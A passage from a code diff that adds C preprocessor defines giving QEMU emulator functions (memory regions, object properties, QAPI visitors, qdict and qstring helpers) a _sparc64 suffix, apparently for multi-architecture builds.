int128_min_sparc64 +#define int128_ne int128_ne_sparc64 +#define int128_neg int128_neg_sparc64 +#define int128_nz int128_nz_sparc64 +#define int128_rshift int128_rshift_sparc64 +#define int128_sub int128_sub_sparc64 +#define int128_subfrom int128_subfrom_sparc64 +#define int128_zero int128_zero_sparc64 +#define int16_to_float32 int16_to_float32_sparc64 +#define int16_to_float64 int16_to_float64_sparc64 +#define int32_to_float128 int32_to_float128_sparc64 +#define int32_to_float32 int32_to_float32_sparc64 +#define int32_to_float64 int32_to_float64_sparc64 +#define int32_to_floatx80 int32_to_floatx80_sparc64 +#define int64_to_float128 int64_to_float128_sparc64 +#define int64_to_float32 int64_to_float32_sparc64 +#define int64_to_float64 int64_to_float64_sparc64 +#define int64_to_floatx80 int64_to_floatx80_sparc64 +#define invalidate_and_set_dirty invalidate_and_set_dirty_sparc64 +#define invalidate_page_bitmap invalidate_page_bitmap_sparc64 +#define io_mem_read io_mem_read_sparc64 +#define io_mem_write io_mem_write_sparc64 +#define io_readb io_readb_sparc64 +#define io_readl io_readl_sparc64 +#define io_readq io_readq_sparc64 +#define io_readw io_readw_sparc64 +#define iotlb_to_region iotlb_to_region_sparc64 +#define io_writeb io_writeb_sparc64 +#define io_writel io_writel_sparc64 +#define io_writeq io_writeq_sparc64 +#define io_writew io_writew_sparc64 +#define is_a64 is_a64_sparc64 +#define is_help_option is_help_option_sparc64 +#define isr_read isr_read_sparc64 +#define is_valid_option_list is_valid_option_list_sparc64 +#define iwmmxt_load_creg iwmmxt_load_creg_sparc64 +#define iwmmxt_load_reg iwmmxt_load_reg_sparc64 +#define iwmmxt_store_creg iwmmxt_store_creg_sparc64 +#define iwmmxt_store_reg iwmmxt_store_reg_sparc64 +#define __jit_debug_descriptor __jit_debug_descriptor_sparc64 +#define __jit_debug_register_code __jit_debug_register_code_sparc64 +#define kvm_to_cpreg_id kvm_to_cpreg_id_sparc64 +#define last_ram_offset last_ram_offset_sparc64 +#define ldl_be_p ldl_be_p_sparc64 +#define ldl_be_phys ldl_be_phys_sparc64 +#define ldl_he_p ldl_he_p_sparc64 +#define ldl_le_p ldl_le_p_sparc64 +#define ldl_le_phys ldl_le_phys_sparc64 +#define ldl_phys ldl_phys_sparc64 +#define ldl_phys_internal ldl_phys_internal_sparc64 +#define ldq_be_p ldq_be_p_sparc64 +#define ldq_be_phys ldq_be_phys_sparc64 +#define ldq_he_p ldq_he_p_sparc64 +#define ldq_le_p ldq_le_p_sparc64 +#define ldq_le_phys ldq_le_phys_sparc64 +#define ldq_phys ldq_phys_sparc64 +#define ldq_phys_internal ldq_phys_internal_sparc64 +#define ldst_name ldst_name_sparc64 +#define ldub_p ldub_p_sparc64 +#define ldub_phys ldub_phys_sparc64 +#define lduw_be_p lduw_be_p_sparc64 +#define lduw_be_phys lduw_be_phys_sparc64 +#define lduw_he_p lduw_he_p_sparc64 +#define lduw_le_p lduw_le_p_sparc64 +#define lduw_le_phys lduw_le_phys_sparc64 +#define lduw_phys lduw_phys_sparc64 +#define lduw_phys_internal lduw_phys_internal_sparc64 +#define le128 le128_sparc64 +#define linked_bp_matches linked_bp_matches_sparc64 +#define listener_add_address_space listener_add_address_space_sparc64 +#define load_cpu_offset load_cpu_offset_sparc64 +#define load_reg load_reg_sparc64 +#define load_reg_var load_reg_var_sparc64 +#define log_cpu_state log_cpu_state_sparc64 +#define lpae_cp_reginfo lpae_cp_reginfo_sparc64 +#define lt128 lt128_sparc64 +#define machine_class_init machine_class_init_sparc64 +#define machine_finalize machine_finalize_sparc64 +#define machine_info machine_info_sparc64 +#define machine_initfn machine_initfn_sparc64 +#define machine_register_types machine_register_types_sparc64 +#define machvirt_init machvirt_init_sparc64 +#define machvirt_machine_init machvirt_machine_init_sparc64 +#define maj maj_sparc64 +#define mapping_conflict mapping_conflict_sparc64 +#define mapping_contiguous mapping_contiguous_sparc64 +#define mapping_have_same_region mapping_have_same_region_sparc64 +#define mapping_merge mapping_merge_sparc64 +#define mem_add mem_add_sparc64 +#define mem_begin mem_begin_sparc64 +#define mem_commit mem_commit_sparc64 +#define memory_access_is_direct memory_access_is_direct_sparc64 +#define memory_access_size memory_access_size_sparc64 +#define memory_init memory_init_sparc64 +#define memory_listener_match memory_listener_match_sparc64 +#define memory_listener_register memory_listener_register_sparc64 +#define memory_listener_unregister memory_listener_unregister_sparc64 +#define memory_map_init memory_map_init_sparc64 +#define memory_mapping_filter memory_mapping_filter_sparc64 +#define memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_sparc64 +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_sparc64 +#define memory_mapping_list_free memory_mapping_list_free_sparc64 +#define memory_mapping_list_init memory_mapping_list_init_sparc64 +#define memory_region_access_valid memory_region_access_valid_sparc64 +#define memory_region_add_subregion memory_region_add_subregion_sparc64 +#define memory_region_add_subregion_common memory_region_add_subregion_common_sparc64 +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_sparc64 +#define memory_region_big_endian memory_region_big_endian_sparc64 +#define memory_region_clear_pending memory_region_clear_pending_sparc64 +#define memory_region_del_subregion memory_region_del_subregion_sparc64 +#define memory_region_destructor_alias memory_region_destructor_alias_sparc64 +#define memory_region_destructor_none memory_region_destructor_none_sparc64 +#define memory_region_destructor_ram memory_region_destructor_ram_sparc64 +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_sparc64 +#define memory_region_dispatch_read memory_region_dispatch_read_sparc64 +#define memory_region_dispatch_read1 memory_region_dispatch_read1_sparc64 +#define memory_region_dispatch_write memory_region_dispatch_write_sparc64 +#define memory_region_escape_name memory_region_escape_name_sparc64 +#define memory_region_finalize memory_region_finalize_sparc64 +#define memory_region_find memory_region_find_sparc64 +#define memory_region_get_addr memory_region_get_addr_sparc64 +#define memory_region_get_alignment memory_region_get_alignment_sparc64 +#define memory_region_get_container memory_region_get_container_sparc64 +#define memory_region_get_fd memory_region_get_fd_sparc64 +#define memory_region_get_may_overlap memory_region_get_may_overlap_sparc64 +#define memory_region_get_priority memory_region_get_priority_sparc64 +#define memory_region_get_ram_addr memory_region_get_ram_addr_sparc64 +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_sparc64 +#define memory_region_get_size memory_region_get_size_sparc64 +#define memory_region_info memory_region_info_sparc64 +#define memory_region_init memory_region_init_sparc64 +#define memory_region_init_alias memory_region_init_alias_sparc64 +#define memory_region_initfn memory_region_initfn_sparc64 +#define memory_region_init_io memory_region_init_io_sparc64 +#define memory_region_init_ram memory_region_init_ram_sparc64 +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_sparc64 +#define memory_region_init_reservation memory_region_init_reservation_sparc64 +#define memory_region_is_iommu memory_region_is_iommu_sparc64 +#define memory_region_is_logging memory_region_is_logging_sparc64 +#define memory_region_is_mapped memory_region_is_mapped_sparc64 +#define memory_region_is_ram memory_region_is_ram_sparc64 +#define memory_region_is_rom memory_region_is_rom_sparc64 +#define memory_region_is_romd memory_region_is_romd_sparc64 +#define memory_region_is_skip_dump memory_region_is_skip_dump_sparc64 +#define memory_region_is_unassigned memory_region_is_unassigned_sparc64 +#define memory_region_name memory_region_name_sparc64 +#define memory_region_need_escape memory_region_need_escape_sparc64 +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_sparc64 +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_sparc64 +#define memory_region_present memory_region_present_sparc64 +#define memory_region_read_accessor memory_region_read_accessor_sparc64 +#define memory_region_readd_subregion memory_region_readd_subregion_sparc64 +#define memory_region_ref memory_region_ref_sparc64 +#define memory_region_resolve_container memory_region_resolve_container_sparc64 +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_sparc64 +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_sparc64 +#define memory_region_set_address memory_region_set_address_sparc64 +#define memory_region_set_alias_offset memory_region_set_alias_offset_sparc64 +#define memory_region_set_enabled memory_region_set_enabled_sparc64 +#define memory_region_set_readonly memory_region_set_readonly_sparc64 +#define memory_region_set_skip_dump memory_region_set_skip_dump_sparc64 +#define memory_region_size memory_region_size_sparc64 +#define memory_region_to_address_space memory_region_to_address_space_sparc64 +#define memory_region_transaction_begin memory_region_transaction_begin_sparc64 +#define memory_region_transaction_commit memory_region_transaction_commit_sparc64 +#define memory_region_unref memory_region_unref_sparc64 +#define memory_region_update_container_subregions memory_region_update_container_subregions_sparc64 +#define memory_region_write_accessor memory_region_write_accessor_sparc64 +#define memory_region_wrong_endianness memory_region_wrong_endianness_sparc64 +#define memory_try_enable_merging memory_try_enable_merging_sparc64 +#define module_call_init module_call_init_sparc64 +#define module_load module_load_sparc64 +#define mpidr_cp_reginfo mpidr_cp_reginfo_sparc64 +#define mpidr_read mpidr_read_sparc64 +#define msr_mask msr_mask_sparc64 +#define mul128By64To192 mul128By64To192_sparc64 +#define mul128To256 mul128To256_sparc64 +#define mul64To128 mul64To128_sparc64 +#define muldiv64 muldiv64_sparc64 +#define neon_2rm_is_float_op neon_2rm_is_float_op_sparc64 +#define neon_2rm_sizes neon_2rm_sizes_sparc64 +#define neon_3r_sizes neon_3r_sizes_sparc64 +#define neon_get_scalar neon_get_scalar_sparc64 +#define neon_load_reg neon_load_reg_sparc64 +#define neon_load_reg64 neon_load_reg64_sparc64 +#define neon_load_scratch neon_load_scratch_sparc64 +#define neon_ls_element_type neon_ls_element_type_sparc64 +#define neon_reg_offset neon_reg_offset_sparc64 +#define neon_store_reg neon_store_reg_sparc64 +#define neon_store_reg64 neon_store_reg64_sparc64 +#define neon_store_scratch neon_store_scratch_sparc64 +#define new_ldst_label new_ldst_label_sparc64 +#define next_list next_list_sparc64 +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_sparc64 +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_sparc64 +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_sparc64 +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_sparc64 +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_sparc64 +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_sparc64 +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_sparc64 +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_sparc64 +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_sparc64 +#define not_v6_cp_reginfo not_v6_cp_reginfo_sparc64 +#define not_v7_cp_reginfo not_v7_cp_reginfo_sparc64 +#define not_v8_cp_reginfo not_v8_cp_reginfo_sparc64 +#define object_child_foreach object_child_foreach_sparc64 +#define object_class_foreach object_class_foreach_sparc64 +#define object_class_foreach_tramp object_class_foreach_tramp_sparc64 +#define object_class_get_list object_class_get_list_sparc64 +#define object_class_get_list_tramp object_class_get_list_tramp_sparc64 +#define object_class_get_parent object_class_get_parent_sparc64 +#define object_deinit object_deinit_sparc64 +#define object_dynamic_cast object_dynamic_cast_sparc64 +#define object_finalize object_finalize_sparc64 +#define object_finalize_child_property object_finalize_child_property_sparc64 +#define object_get_child_property object_get_child_property_sparc64 +#define object_get_link_property object_get_link_property_sparc64 +#define object_get_root object_get_root_sparc64 +#define object_initialize_with_type object_initialize_with_type_sparc64 +#define object_init_with_type object_init_with_type_sparc64 +#define object_instance_init object_instance_init_sparc64 +#define object_new_with_type object_new_with_type_sparc64 +#define object_post_init_with_type object_post_init_with_type_sparc64 +#define object_property_add_alias object_property_add_alias_sparc64 +#define object_property_add_link object_property_add_link_sparc64 +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_sparc64 +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_sparc64 +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_sparc64 +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_sparc64 +#define object_property_allow_set_link object_property_allow_set_link_sparc64 +#define object_property_del object_property_del_sparc64 +#define object_property_del_all object_property_del_all_sparc64 +#define object_property_find object_property_find_sparc64 +#define object_property_get object_property_get_sparc64 +#define object_property_get_bool object_property_get_bool_sparc64 +#define object_property_get_int object_property_get_int_sparc64 +#define object_property_get_link object_property_get_link_sparc64 +#define object_property_get_qobject object_property_get_qobject_sparc64 +#define object_property_get_str object_property_get_str_sparc64 +#define object_property_get_type object_property_get_type_sparc64 +#define object_property_is_child object_property_is_child_sparc64 +#define object_property_set object_property_set_sparc64 +#define object_property_set_description object_property_set_description_sparc64 +#define object_property_set_link object_property_set_link_sparc64 +#define object_property_set_qobject object_property_set_qobject_sparc64 +#define object_release_link_property object_release_link_property_sparc64 +#define object_resolve_abs_path object_resolve_abs_path_sparc64 +#define object_resolve_child_property object_resolve_child_property_sparc64 +#define object_resolve_link object_resolve_link_sparc64 +#define object_resolve_link_property object_resolve_link_property_sparc64 +#define object_resolve_partial_path object_resolve_partial_path_sparc64 +#define object_resolve_path object_resolve_path_sparc64 +#define object_resolve_path_component object_resolve_path_component_sparc64 +#define object_resolve_path_type object_resolve_path_type_sparc64 +#define object_set_link_property object_set_link_property_sparc64 +#define object_unparent object_unparent_sparc64 +#define omap_cachemaint_write omap_cachemaint_write_sparc64 +#define omap_cp_reginfo omap_cp_reginfo_sparc64 +#define omap_threadid_write omap_threadid_write_sparc64 +#define omap_ticonfig_write omap_ticonfig_write_sparc64 +#define omap_wfi_write omap_wfi_write_sparc64 +#define op_bits op_bits_sparc64 +#define open_modeflags open_modeflags_sparc64 +#define op_to_mov op_to_mov_sparc64 +#define op_to_movi op_to_movi_sparc64 +#define output_type_enum output_type_enum_sparc64 +#define packFloat128 packFloat128_sparc64 +#define packFloat16 packFloat16_sparc64 +#define packFloat32 packFloat32_sparc64 +#define packFloat64 packFloat64_sparc64 +#define packFloatx80 packFloatx80_sparc64 +#define page_find page_find_sparc64 +#define page_find_alloc page_find_alloc_sparc64 +#define page_flush_tb page_flush_tb_sparc64 +#define page_flush_tb_1 page_flush_tb_1_sparc64 +#define page_init page_init_sparc64 +#define page_size_init page_size_init_sparc64 +#define par par_sparc64 +#define parse_array parse_array_sparc64 +#define parse_error parse_error_sparc64 +#define parse_escape parse_escape_sparc64 +#define parse_keyword parse_keyword_sparc64 +#define parse_literal parse_literal_sparc64 +#define parse_object parse_object_sparc64 +#define parse_optional parse_optional_sparc64 +#define parse_option_bool parse_option_bool_sparc64 +#define parse_option_number parse_option_number_sparc64 +#define parse_option_size parse_option_size_sparc64 +#define parse_pair parse_pair_sparc64 +#define parser_context_free parser_context_free_sparc64 +#define parser_context_new parser_context_new_sparc64 +#define parser_context_peek_token parser_context_peek_token_sparc64 +#define parser_context_pop_token parser_context_pop_token_sparc64 +#define parser_context_restore parser_context_restore_sparc64 +#define parser_context_save parser_context_save_sparc64 +#define parse_str parse_str_sparc64 +#define parse_type_bool parse_type_bool_sparc64 +#define parse_type_int parse_type_int_sparc64 +#define parse_type_number parse_type_number_sparc64 +#define parse_type_size parse_type_size_sparc64 +#define parse_type_str parse_type_str_sparc64 +#define parse_value parse_value_sparc64 +#define par_write par_write_sparc64 +#define patch_reloc patch_reloc_sparc64 +#define phys_map_node_alloc phys_map_node_alloc_sparc64 +#define phys_map_node_reserve phys_map_node_reserve_sparc64 +#define phys_mem_alloc phys_mem_alloc_sparc64 +#define phys_mem_set_alloc phys_mem_set_alloc_sparc64 +#define phys_page_compact phys_page_compact_sparc64 +#define phys_page_compact_all phys_page_compact_all_sparc64 +#define phys_page_find phys_page_find_sparc64 +#define phys_page_set phys_page_set_sparc64 +#define phys_page_set_level phys_page_set_level_sparc64 +#define phys_section_add phys_section_add_sparc64 +#define phys_section_destroy phys_section_destroy_sparc64 +#define phys_sections_free phys_sections_free_sparc64 +#define pickNaN pickNaN_sparc64 +#define pickNaNMulAdd pickNaNMulAdd_sparc64 +#define pmccfiltr_write pmccfiltr_write_sparc64 +#define pmccntr_read pmccntr_read_sparc64 +#define pmccntr_sync pmccntr_sync_sparc64 +#define pmccntr_write pmccntr_write_sparc64 +#define pmccntr_write32 pmccntr_write32_sparc64 +#define pmcntenclr_write pmcntenclr_write_sparc64 +#define pmcntenset_write pmcntenset_write_sparc64 +#define pmcr_write pmcr_write_sparc64 +#define pmintenclr_write pmintenclr_write_sparc64 +#define pmintenset_write pmintenset_write_sparc64 +#define pmovsr_write pmovsr_write_sparc64 +#define pmreg_access pmreg_access_sparc64 +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_sparc64 +#define pmsav5_data_ap_read pmsav5_data_ap_read_sparc64 +#define pmsav5_data_ap_write pmsav5_data_ap_write_sparc64 +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_sparc64 +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_sparc64 +#define pmuserenr_write pmuserenr_write_sparc64 +#define pmxevtyper_write pmxevtyper_write_sparc64 +#define print_type_bool print_type_bool_sparc64 +#define print_type_int print_type_int_sparc64 +#define print_type_number print_type_number_sparc64 +#define print_type_size print_type_size_sparc64 +#define print_type_str print_type_str_sparc64 +#define propagateFloat128NaN propagateFloat128NaN_sparc64 +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_sparc64 +#define propagateFloat32NaN propagateFloat32NaN_sparc64 +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_sparc64 +#define propagateFloat64NaN propagateFloat64NaN_sparc64 +#define propagateFloatx80NaN propagateFloatx80NaN_sparc64 +#define property_get_alias property_get_alias_sparc64 +#define property_get_bool property_get_bool_sparc64 +#define property_get_str property_get_str_sparc64 +#define property_get_uint16_ptr property_get_uint16_ptr_sparc64 +#define property_get_uint32_ptr property_get_uint32_ptr_sparc64 +#define property_get_uint64_ptr property_get_uint64_ptr_sparc64 +#define property_get_uint8_ptr property_get_uint8_ptr_sparc64 +#define property_release_alias property_release_alias_sparc64 +#define property_release_bool property_release_bool_sparc64 +#define property_release_str property_release_str_sparc64 +#define property_resolve_alias property_resolve_alias_sparc64 +#define property_set_alias property_set_alias_sparc64 +#define property_set_bool property_set_bool_sparc64 +#define property_set_str property_set_str_sparc64 +#define pstate_read pstate_read_sparc64 +#define pstate_write pstate_write_sparc64 +#define pxa250_initfn pxa250_initfn_sparc64 +#define pxa255_initfn pxa255_initfn_sparc64 +#define pxa260_initfn pxa260_initfn_sparc64 +#define pxa261_initfn pxa261_initfn_sparc64 +#define pxa262_initfn pxa262_initfn_sparc64 +#define pxa270a0_initfn pxa270a0_initfn_sparc64 +#define pxa270a1_initfn pxa270a1_initfn_sparc64 +#define pxa270b0_initfn pxa270b0_initfn_sparc64 +#define pxa270b1_initfn pxa270b1_initfn_sparc64 +#define pxa270c0_initfn pxa270c0_initfn_sparc64 +#define pxa270c5_initfn pxa270c5_initfn_sparc64 +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_sparc64 +#define qapi_dealloc_end_list qapi_dealloc_end_list_sparc64 +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_sparc64 +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_sparc64 +#define qapi_dealloc_next_list qapi_dealloc_next_list_sparc64 +#define qapi_dealloc_pop qapi_dealloc_pop_sparc64 +#define qapi_dealloc_push qapi_dealloc_push_sparc64 +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_sparc64 +#define qapi_dealloc_start_list qapi_dealloc_start_list_sparc64 +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_sparc64 +#define qapi_dealloc_start_union qapi_dealloc_start_union_sparc64 +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_sparc64 +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_sparc64 +#define qapi_dealloc_type_int qapi_dealloc_type_int_sparc64 +#define qapi_dealloc_type_number qapi_dealloc_type_number_sparc64 +#define qapi_dealloc_type_size qapi_dealloc_type_size_sparc64 +#define qapi_dealloc_type_str qapi_dealloc_type_str_sparc64 +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_sparc64 +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_sparc64 +#define qapi_free_boolList qapi_free_boolList_sparc64 +#define qapi_free_ErrorClassList qapi_free_ErrorClassList_sparc64 +#define qapi_free_int16List qapi_free_int16List_sparc64 +#define qapi_free_int32List qapi_free_int32List_sparc64 +#define qapi_free_int64List qapi_free_int64List_sparc64 +#define qapi_free_int8List qapi_free_int8List_sparc64 +#define qapi_free_intList qapi_free_intList_sparc64 +#define qapi_free_numberList qapi_free_numberList_sparc64 +#define qapi_free_strList qapi_free_strList_sparc64 +#define qapi_free_uint16List qapi_free_uint16List_sparc64 +#define qapi_free_uint32List qapi_free_uint32List_sparc64 +#define qapi_free_uint64List qapi_free_uint64List_sparc64 +#define qapi_free_uint8List qapi_free_uint8List_sparc64 +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_sparc64 +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_sparc64 +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_sparc64 +#define qbool_destroy_obj qbool_destroy_obj_sparc64 +#define qbool_from_int qbool_from_int_sparc64 +#define qbool_get_int qbool_get_int_sparc64 +#define qbool_type qbool_type_sparc64 +#define qbus_create qbus_create_sparc64 +#define qbus_create_inplace qbus_create_inplace_sparc64 +#define qbus_finalize qbus_finalize_sparc64 +#define qbus_initfn qbus_initfn_sparc64 +#define qbus_realize qbus_realize_sparc64 +#define qdev_create qdev_create_sparc64 +#define qdev_get_type qdev_get_type_sparc64 +#define qdev_register_types qdev_register_types_sparc64 +#define qdev_set_parent_bus qdev_set_parent_bus_sparc64 +#define qdev_try_create qdev_try_create_sparc64 +#define qdict_add_key qdict_add_key_sparc64 +#define qdict_array_split qdict_array_split_sparc64 +#define qdict_clone_shallow qdict_clone_shallow_sparc64 +#define qdict_del qdict_del_sparc64 +#define qdict_destroy_obj qdict_destroy_obj_sparc64 +#define qdict_entry_key qdict_entry_key_sparc64 +#define qdict_entry_value qdict_entry_value_sparc64 +#define qdict_extract_subqdict qdict_extract_subqdict_sparc64 +#define qdict_find qdict_find_sparc64 +#define qdict_first qdict_first_sparc64 +#define qdict_flatten qdict_flatten_sparc64 +#define qdict_flatten_qdict qdict_flatten_qdict_sparc64 +#define qdict_flatten_qlist qdict_flatten_qlist_sparc64 +#define qdict_get qdict_get_sparc64 +#define qdict_get_bool qdict_get_bool_sparc64 +#define qdict_get_double qdict_get_double_sparc64 +#define qdict_get_int qdict_get_int_sparc64 +#define qdict_get_obj qdict_get_obj_sparc64 +#define qdict_get_qdict qdict_get_qdict_sparc64 +#define qdict_get_qlist qdict_get_qlist_sparc64 +#define qdict_get_str qdict_get_str_sparc64 +#define qdict_get_try_bool qdict_get_try_bool_sparc64 +#define qdict_get_try_int qdict_get_try_int_sparc64 +#define qdict_get_try_str qdict_get_try_str_sparc64 +#define qdict_haskey qdict_haskey_sparc64 +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_sparc64 +#define qdict_iter qdict_iter_sparc64 +#define qdict_join qdict_join_sparc64 +#define qdict_new qdict_new_sparc64 +#define qdict_next qdict_next_sparc64 +#define qdict_next_entry qdict_next_entry_sparc64 +#define qdict_put_obj qdict_put_obj_sparc64 +#define qdict_size qdict_size_sparc64 +#define qdict_type qdict_type_sparc64 +#define qemu_clock_get_us qemu_clock_get_us_sparc64 +#define qemu_clock_ptr qemu_clock_ptr_sparc64 +#define qemu_clocks qemu_clocks_sparc64 +#define qemu_get_cpu qemu_get_cpu_sparc64 +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_sparc64 +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_sparc64 +#define qemu_get_ram_block qemu_get_ram_block_sparc64 +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_sparc64 +#define qemu_get_ram_fd qemu_get_ram_fd_sparc64 +#define qemu_get_ram_ptr qemu_get_ram_ptr_sparc64 +#define qemu_host_page_mask qemu_host_page_mask_sparc64 +#define qemu_host_page_size qemu_host_page_size_sparc64 +#define qemu_init_vcpu qemu_init_vcpu_sparc64 +#define qemu_ld_helpers qemu_ld_helpers_sparc64 +#define qemu_log_close qemu_log_close_sparc64 +#define qemu_log_enabled qemu_log_enabled_sparc64 +#define qemu_log_flush qemu_log_flush_sparc64 +#define qemu_loglevel_mask qemu_loglevel_mask_sparc64 +#define qemu_log_vprintf qemu_log_vprintf_sparc64 +#define qemu_oom_check qemu_oom_check_sparc64 +#define qemu_parse_fd qemu_parse_fd_sparc64 +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_sparc64 +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_sparc64 +#define qemu_ram_alloc qemu_ram_alloc_sparc64 +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_sparc64 +#define qemu_ram_foreach_block qemu_ram_foreach_block_sparc64 +#define qemu_ram_free qemu_ram_free_sparc64 +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_sparc64 +#define qemu_ram_ptr_length qemu_ram_ptr_length_sparc64 +#define qemu_ram_remap qemu_ram_remap_sparc64 +#define qemu_ram_setup_dump qemu_ram_setup_dump_sparc64 +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_sparc64 +#define qemu_real_host_page_size qemu_real_host_page_size_sparc64 +#define qemu_st_helpers qemu_st_helpers_sparc64 +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_sparc64 +#define qemu_try_memalign qemu_try_memalign_sparc64 +#define qentry_destroy qentry_destroy_sparc64 +#define qerror_human qerror_human_sparc64 +#define qerror_report qerror_report_sparc64 +#define qerror_report_err qerror_report_err_sparc64 +#define qfloat_destroy_obj qfloat_destroy_obj_sparc64 +#define qfloat_from_double qfloat_from_double_sparc64 +#define qfloat_get_double qfloat_get_double_sparc64 +#define qfloat_type qfloat_type_sparc64 +#define qint_destroy_obj qint_destroy_obj_sparc64 +#define qint_from_int qint_from_int_sparc64 +#define qint_get_int qint_get_int_sparc64 +#define qint_type qint_type_sparc64 +#define qlist_append_obj qlist_append_obj_sparc64 +#define qlist_copy qlist_copy_sparc64 +#define qlist_copy_elem qlist_copy_elem_sparc64 +#define qlist_destroy_obj qlist_destroy_obj_sparc64 +#define qlist_empty qlist_empty_sparc64 +#define qlist_entry_obj qlist_entry_obj_sparc64 +#define qlist_first qlist_first_sparc64 +#define qlist_iter qlist_iter_sparc64 +#define qlist_new qlist_new_sparc64 +#define qlist_next qlist_next_sparc64 +#define qlist_peek qlist_peek_sparc64 +#define qlist_pop qlist_pop_sparc64 +#define qlist_size qlist_size_sparc64 +#define qlist_size_iter qlist_size_iter_sparc64 +#define qlist_type qlist_type_sparc64 +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_sparc64 +#define qmp_input_end_list qmp_input_end_list_sparc64 +#define qmp_input_end_struct qmp_input_end_struct_sparc64 +#define qmp_input_get_next_type qmp_input_get_next_type_sparc64 +#define qmp_input_get_object qmp_input_get_object_sparc64 +#define qmp_input_get_visitor qmp_input_get_visitor_sparc64 +#define qmp_input_next_list qmp_input_next_list_sparc64 +#define qmp_input_optional qmp_input_optional_sparc64 +#define qmp_input_pop qmp_input_pop_sparc64 +#define qmp_input_push qmp_input_push_sparc64 +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_sparc64 +#define qmp_input_start_list qmp_input_start_list_sparc64 +#define qmp_input_start_struct qmp_input_start_struct_sparc64 +#define qmp_input_type_bool qmp_input_type_bool_sparc64 +#define qmp_input_type_int qmp_input_type_int_sparc64 +#define qmp_input_type_number qmp_input_type_number_sparc64 +#define qmp_input_type_str qmp_input_type_str_sparc64 +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_sparc64 +#define qmp_input_visitor_new qmp_input_visitor_new_sparc64 +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_sparc64 +#define qmp_output_add_obj qmp_output_add_obj_sparc64 +#define qmp_output_end_list qmp_output_end_list_sparc64 +#define qmp_output_end_struct qmp_output_end_struct_sparc64 +#define qmp_output_first qmp_output_first_sparc64 +#define qmp_output_get_qobject qmp_output_get_qobject_sparc64 +#define qmp_output_get_visitor qmp_output_get_visitor_sparc64 +#define qmp_output_last qmp_output_last_sparc64 +#define qmp_output_next_list qmp_output_next_list_sparc64 +#define qmp_output_pop qmp_output_pop_sparc64 +#define qmp_output_push_obj qmp_output_push_obj_sparc64 +#define qmp_output_start_list qmp_output_start_list_sparc64 +#define qmp_output_start_struct qmp_output_start_struct_sparc64 +#define qmp_output_type_bool qmp_output_type_bool_sparc64 +#define qmp_output_type_int qmp_output_type_int_sparc64 +#define qmp_output_type_number qmp_output_type_number_sparc64 +#define qmp_output_type_str qmp_output_type_str_sparc64 +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_sparc64 +#define qmp_output_visitor_new qmp_output_visitor_new_sparc64 +#define qobject_decref qobject_decref_sparc64 +#define qobject_to_qbool qobject_to_qbool_sparc64 +#define qobject_to_qdict qobject_to_qdict_sparc64 +#define qobject_to_qfloat qobject_to_qfloat_sparc64 +#define qobject_to_qint qobject_to_qint_sparc64 +#define qobject_to_qlist qobject_to_qlist_sparc64 +#define qobject_to_qstring qobject_to_qstring_sparc64 +#define qobject_type qobject_type_sparc64 +#define qstring_append qstring_append_sparc64 +#define qstring_append_chr qstring_append_chr_sparc64 +#define qstring_append_int qstring_append_int_sparc64 +#define qstring_destroy_obj qstring_destroy_obj_sparc64 +#define qstring_from_escaped_str qstring_from_escaped_str_sparc64 +#define qstring_from_str qstring_from_str_sparc64 +#define qstring_from_substr qstring_from_substr_sparc64 +#define qstring_get_length qstring_get_length_sparc64 +#define qstring_get_str qstring_get_str_sparc64 +#define qstring_new 